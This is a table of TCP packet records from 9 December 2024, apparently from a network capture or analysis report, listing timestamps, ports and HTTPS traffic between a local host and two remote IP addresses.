                                                                                                                      Dec 9, 2024 16:34:08.729860067 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.735394955 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.735419035 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.735475063 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.735483885 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.735527992 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.763897896 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.763917923 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.763988018 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.763993025 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.764029980 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.886081934 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.886106968 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.886176109 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.886184931 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.886226892 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.899127007 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.899152994 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.899211884 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.899216890 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.899262905 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.904567003 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.904589891 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.904642105 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.904645920 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.904684067 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.910552979 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.910578012 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.910657883 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.910662889 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.910701990 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.915880919 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.915904999 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.915956974 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.915961027 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.915999889 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.921828985 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.921859026 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.921906948 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.921912909 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.921947956 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.921967030 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.927683115 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.927700996 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.927769899 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.927774906 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.927810907 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.954130888 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.954150915 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.954256058 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:08.954261065 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:08.954317093 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.078210115 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.078247070 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.078352928 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.078371048 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.079221010 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.091197968 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.882447004 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.882472992 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.882534027 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.882539034 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.882618904 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.921236038 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.921262026 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.921324015 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.921344995 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.921386957 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.926059961 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.926084995 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.926126957 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.926131964 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:09.926156998 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:09.926177025 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.038721085 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.038757086 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.038805008 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.038830042 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.038860083 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.038892984 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.051557064 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.051574945 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.051618099 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.051640034 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.051667929 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.051673889 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.057488918 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.057507038 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.057543993 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.057549953 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.057581902 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.058340073 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.058381081 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.058386087 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.058403015 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:10.058442116 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:10.061176062 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:14.620261908 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.620311975 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:14.620492935 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.624006987 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.624062061 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:14.624412060 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.627238989 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.627266884 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:14.631545067 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.965377092 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.965400934 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:14.966906071 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.966941118 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:14.969435930 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:14.969470978 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:15.001595974 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:15.001655102 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:15.001866102 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:15.008378029 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:15.008410931 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.495402098 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.495541096 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.499289036 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.499376059 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.499409914 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.499470949 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.536737919 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.536818027 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.759104967 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.759145975 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.759506941 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.759519100 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.759763956 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.760432005 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.760453939 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.760689974 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.760699987 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.760773897 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.760879993 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.761567116 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.761604071 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.761737108 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.761746883 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.761890888 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.761909962 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.761938095 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.761953115 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.762152910 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.762162924 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.762223959 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:16.762320042 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:16.803342104 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.125194073 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.125221014 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.125241041 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.125267982 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.125286102 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.125300884 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.125359058 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.128784895 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.128815889 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.128861904 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.128875017 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.128875017 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.128889084 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.128937006 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.132013083 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.132040977 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.132062912 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.132075071 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.132100105 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.132122040 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.132159948 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.140507936 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.140536070 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.140552044 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.140573978 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.140608072 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.140629053 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.140645027 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.140664101 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.308232069 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.308269978 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.308406115 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.308422089 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.308533907 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.315022945 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.315057039 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.315109015 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.315140009 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.315140009 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.315160990 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.315169096 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.315217018 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.315227032 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.315237999 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.315262079 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.315278053 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.319719076 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.319755077 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.319789886 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.319823027 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.319847107 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.319864035 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.361428976 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.361459970 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.361521959 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.361537933 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.361576080 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.361576080 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.363280058 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.363327026 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.721657991 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.721683025 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.721740961 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.721765995 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.721792936 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.721807003 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.729191065 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.729231119 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.729269028 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.729281902 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.729347944 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.729347944 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.729717016 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.729752064 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.729803085 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.729820013 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.729856968 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.729856968 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.731081963 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.731108904 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.731158972 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.731184006 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.731204033 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.731228113 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.742002964 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.742038965 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.742074013 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.742167950 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.742180109 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.742222071 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.742955923 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.742994070 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.743061066 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.743073940 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.743102074 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.743161917 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.744568110 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.744594097 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.744645119 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.744663000 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.744723082 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.744723082 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.745129108 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.745162010 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.745194912 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.745210886 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.745270014 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.745287895 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.761189938 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.761219025 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.761276007 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.761300087 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.761346102 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.761364937 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.762983084 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.763010025 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.763061047 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.763075113 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.763113022 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.763129950 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.781795979 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.781836987 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.781920910 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.781936884 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.782036066 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.854731083 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.854778051 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.854850054 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.854882002 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.854927063 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.854928017 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.862076998 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.862116098 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.862179041 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.862194061 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.862217903 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.862230062 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.864309072 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.864334106 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.864394903 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.864425898 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.864443064 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.864476919 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.867052078 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.867084980 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.867130041 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.867155075 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.867182016 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.867202044 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.867228985 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.867233038 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.867243052 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.867259979 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.867273092 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.867304087 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.872056961 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.872087955 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.872190952 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.872190952 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.872229099 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.872265100 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.874418974 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.874448061 CET44349731150.171.27.10192.168.2.6
